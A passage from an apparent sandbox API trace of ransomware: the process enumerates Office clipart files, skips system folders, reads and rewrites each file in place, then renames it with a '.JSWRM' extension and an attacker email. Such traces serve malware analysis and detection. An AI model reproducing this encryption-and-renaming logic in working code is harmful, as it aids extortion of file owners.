(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.394] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x614, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03236_.WMF", cAlternateFileName="")) returned 1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2=".") returned 1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="..") returned 1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="...") returned 1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="windows") returned -1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="recovery") returned -1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="perflogs") returned -1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="documents and settings") returned 1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="system volume information") returned -1 [0093.394] lstrcmpiW (lpString1="PE03236_.WMF", lpString2="msocache") returned 1 [0093.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0093.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03236_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03236_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03236_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0093.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03236_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03236_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03236_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.395] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1556) returned 1 [0093.395] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x610) returned 0x2332c0 [0093.395] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x610, lpOverlapped=0x0) returned 1 [0093.396] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.396] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x610, lpOverlapped=0x0) returned 1 [0093.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0093.397] CloseHandle (hObject=0x314) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0093.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0093.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0093.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0093.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0093.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.398] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03241_.WMF", cAlternateFileName="")) returned 1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2=".") returned 1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="..") returned 1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="...") returned 1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="windows") returned -1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="recovery") returned -1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="perflogs") returned -1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="documents and settings") returned 1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="system volume information") returned -1 [0093.398] lstrcmpiW (lpString1="PE03241_.WMF", lpString2="msocache") returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0093.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03241_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03241_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03241_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0093.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0093.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03241_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03241_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03241_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0093.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0093.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.399] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2228) returned 1 [0093.399] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x20c6c0 [0093.399] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0093.401] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.401] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0093.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0093.401] CloseHandle (hObject=0x314) returned 1 [0093.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0093.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0093.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0093.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0093.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0093.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0093.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.402] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3380, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03257_.WMF", cAlternateFileName="")) returned 1 [0093.402] lstrcmpiW (lpString1="PE03257_.WMF", lpString2=".") returned 1 [0093.402] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="..") returned 1 [0093.402] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="...") returned 1 [0093.402] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="windows") returned -1 [0093.403] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="recovery") returned -1 [0093.403] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="perflogs") returned -1 [0093.403] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="documents and settings") returned 1 [0093.403] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.403] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="system volume information") returned -1 [0093.403] lstrcmpiW (lpString1="PE03257_.WMF", lpString2="msocache") returned 1 [0093.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03257_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03257_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03257_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03257_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03257_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03257_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0093.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.404] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13184) returned 1 [0093.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3380) returned 0x24d210 [0093.404] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3380, lpOverlapped=0x0) returned 1 [0093.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.406] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3380, lpOverlapped=0x0) returned 1 [0093.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.407] CloseHandle (hObject=0x314) returned 1 [0093.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0093.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0093.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0093.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0093.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0093.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0093.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0093.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0093.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.408] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03331_.WMF", cAlternateFileName="")) returned 1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2=".") returned 1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="..") returned 1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="...") returned 1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="windows") returned -1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="recovery") returned -1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="perflogs") returned -1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="documents and settings") returned 1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", 